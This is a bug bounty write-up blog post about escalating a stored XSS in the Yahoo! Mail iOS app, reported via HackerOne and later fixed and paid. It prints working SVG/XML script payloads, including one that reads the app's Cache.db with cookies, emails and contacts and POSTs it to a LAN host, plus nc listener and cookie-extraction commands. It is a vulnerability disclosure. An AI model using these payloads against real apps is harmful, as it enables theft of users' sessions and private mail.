WRITE UP – LOVE STORY, FROM CLOSED AS INFORMATIVE TO $3,500 USD, XSS STORED IN YAHOO! IOS MAIL APP

Hi everyone It’s been a while from my last post but I’m back, I want to tell you a love story about Yahoo! bug bounty program that is very great because I learned a lot of lessons, so I got into Yahoo! Security Hall of Fame (2018) via Hackerone, so here we go:

Report Summary (first try):

Hi Yahoo! team. I’ve found a XSS stored in Yahoo! Mail iOS app via xml file.

Description and impact:

The attackers can render arbitrary HTML/Javascript code via XML specially crafted in background since the code runs every time that you open any attachment in the same email in Yahoo! Mail iOS application in production environment. (and make exponential entity expansion DOS attack and crash the app)

Steps To Reproduce (Extracted from the h1 report):

1.- Login to your yahoo email account in any client and upload a xml file with the following content and send it via email (yahoo-xss.xml file attached):

<?xml version="1.0" encoding="utf-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script>prompt(document.location)</script>
</svg>

2.- Look up for the xml file in the iOS app, click to open it and see the XSS.

Note: I don’t why, but the xml rendering behavior in the Yahoo! Mail iOS app is very weird and dangerous, the XSS stored shows up when you click any email attachment, per example, if you have 5 attachments, if you click any of them, the XSS shows up every single time no matters what attachment you opened

Hackerone staff response ( Closed as informative )

well, then at this moment I need to find a way to prove myself that this can be explotable in pretty bad way, but nothing came to my mind so I just keep going with my life.

Resend the report (second try):

One day I thought about that closed as informative report on h1 about yahoo xss and the I got an idea that help me to scalate that innofensive xss to something bigger, What if I could make http request like “GET” to local app resources? BINGO That’s how I was able to get full cache database of the yahoo! iOS app included user cookies, contact list, email content, etc.

Steps To Reproduce (Extracted from the h1 report):

1.- Login to your yahoo email account in any client and upload a xml file with the following content and send it via email (dump_mails.xml and cachedb_post.xml file attached).

2.- Open the email attachment: Scenario the attacker send a powerpoint presentation but there is the xml attached to, so when the victim opens the powerpoint file I don’t why, but the xml the XSS stored works, per example, if you have 5 attachments, if you click any of them, the XSS shows up every single time no matters what attachment you opened (video attached).

Getting the mail contact list, including senders,receivers and contactlist (dump_mails.xml) :
3A.- See the XSS’s shows up first the navigator.appVersion, then the file location, then the email list (take some time about 30s depending your internet connection) and when you click ok the email list is sent via GET to any sever (screenshot attached) , in my case was my own computer in my LAN. with nc -lvvv 8090

Getting the Cookies (cache.db file via cachedb_post.xml) :
3B.- See the XSS’s shows up first the navigator.appVersion, then the file location, then see an “empty” alert (take some time about 30s depending your internet connection), but when you click ok the full Cache.db file is sent via POST to any sever (screenshot attached), in my case was my own computer in my LAN. with nc -lvvv 8090 > yahoo.db

then after dumping the cache.db file erase the headers and then make the query to get the cookies
strings yahoo.db | grep -i Cookie -A 10 -B 5

bonus: also you can enumerate the app http endpoints to “use” the cookies.
strings yahoo.db | grep -i https

Impact: Any attacker cand steal the Cookies and Yahoo! user emails (including senders,receivers and contactlist even the email content) via cache.db in background and send it to any server.

script transcript:

// cachedb_post.xml file
<?xml version="1.0" encoding="utf-8"?>
<svg onload="alert(document.location);" xmlns="http://www.w3.org/2000/svg">
<script>
alert(navigator.appVersion);
<![CDATA[
function GetMailAddress(mailcontent){
var content_reg = new RegExp(".+",'g');
var reg = mailcontent.replace('/\s/g','').replace('/\S/g','').replace(/\s\s+/g,' ').replace(/\n\s*\n/g,'\n').match(content_reg);

alert(reg);
send_response(reg)
}

function read_file(read_file_path,tag){
var oReq = new XMLHttpRequest();
oReq.addEventListener("load", function(){
if (tag === true){
GetMailAddress(this.responseText.toString());
} else {
alert(this.responseText);
}
}
);

oReq.open("GET", read_file_path);
oReq.send();
}

function send_response(response){
var oReqX = new XMLHttpRequest();
oReqX.open("POST","http://192.168.1.109:8090/");
oReqX.send(response);
}

var Lib_file_path = location.href.split('Library')[0] + 'Library';
var cache_db = Lib_file_path + '/Caches/com.yahoo.Aerogram/Cache.db';
read_file(cache_db,true);
]]>
</script>
</svg>

Hackerone staff response (Reopened, Trigged, Fixed and good bounty paid by Yahoo team)

Environment
iPhone 6 – iOS v11.2.5.
Yahoo! Mail app v4.XX.X (XXXXX)
My personal email account and all testing was seding emails to myself.

Yahoo! Hall of fame:

https://hackerone.com/yahoo/thanks/2018

well that’s it that is how this love story ends, if you have any thoughts, doubts, comment or sugestion just drop me a line here or in twitter @omespino, read you later.

18 thoughts on “WRITE UP – LOVE STORY, FROM CLOSED AS INFORMATIVE TO $3,500 USD, XSS STORED IN YAHOO! IOS MAIL APP

    1. In this case was specific in iOS because the app was rendering xml files and executing the javascript code inside the xml, in android the behavior wasn’t the same because yahoo mail android app not render thoose kind of files, just downloads it

    1. After I commented that I got a new explotation vector, about 5 weeks to reopened and triaged the same day after some couple of hours

Leave a Reply to pato Cancel reply

Your email address will not be published.